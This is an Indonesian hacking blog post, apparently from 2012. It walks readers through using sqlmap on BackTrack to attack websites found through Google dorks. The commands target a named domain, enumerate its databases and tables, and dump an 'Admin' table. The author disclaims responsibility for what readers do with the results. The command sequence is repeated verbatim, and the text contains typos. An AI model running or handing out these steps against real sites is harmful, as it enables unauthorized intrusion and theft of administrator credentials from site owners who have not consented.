- Back to Home »
- Hacking »
- Scan Menggunakan SQL Sqlmap.py Backtrack
Posted by : Wildan A Nugraha
August 03, 2012
SQL Sqlmap.py
Oke
kawan-kawan sekalian kali ini saya akan berbagi tutorial dengan SQLi
menggunakan SQLMAP salah satu tools pentets yang ada di dalam backtrack...
Okeee sekarang kita langsung aja ke'TKP....
Yang pertama harus di lakukan adalah nyalain laptop/pc kalian yang menggunakan backtrack, backtrack virtual juga boleh...
Yang pertama harus di lakukan adalah nyalain laptop/pc kalian yang menggunakan backtrack, backtrack virtual juga boleh...
ahahahahha..
ok serius nie..
1.buka Sqlmap kalian dengan cara
Code:
Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP
2.cari lah target yang sudah kalian temukan celahnya dengan menggunakan google dork...
3.setelah dapet web yang ada celah silakan pentest..
Code:
python sqlmap.py -u http://alcyber.com/catalog.php?id=129 --dbs
-u = url
--dbs = kita mencari nama databasenya...
4.setalah ketemua nama databasenya..
Code:
python sqlmap.py -u http://alcyber.com/catalog.php?id=129 -D alcyber --tables
-D = nama database yang sudah kita temukan tadi
--tables = untuk muka isi table..
5.isi tabel udah keluar dan ada hasilnya ternyata ada table admin kita liat columnsnya...
Code:
python sqlmap.py http://alcyber.com -D alcyber -T Admin --columns
Code:
pytho sqlmap.py http://alcyber.com -D alcyber -T Admin --dump
kalo udah begini silakan dah..
mau kalian apain tapi yang jelas saya tidak tanggung jawab ya..
ok serius nie..
1.buka Sqlmap kalian dengan cara
Code:
Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP
2.cari lah target yang sudah kalian temukan celahnya dengan menggunakan google dork...
3.setelah dapet web yang ada celah silakan pentest..
Code:
python sqlmap.py -u http://alcyber.com/catalog.php?id=129 --dbs
-u = url
--dbs = kita mencari nama databasenya...
4.setalah ketemua nama databasenya..
Code:
python sqlmap.py -u http://alcyber.com/catalog.php?id=129 -D alcyber --tables
-D = nama database yang sudah kita temukan tadi
--tables = untuk muka isi table..
5.isi tabel udah keluar dan ada hasilnya ternyata ada table admin kita liat columnsnya...
Code:
python sqlmap.py http://alcyber.com -D alcyber -T Admin --columns
Code:
pytho sqlmap.py http://alcyber.com -D alcyber -T Admin --dump
kalo udah begini silakan dah..
mau kalian apain tapi yang jelas saya tidak tanggung jawab ya..
ahahahhaa..
Salam By. Noegros Official
Salam By. Noegros Official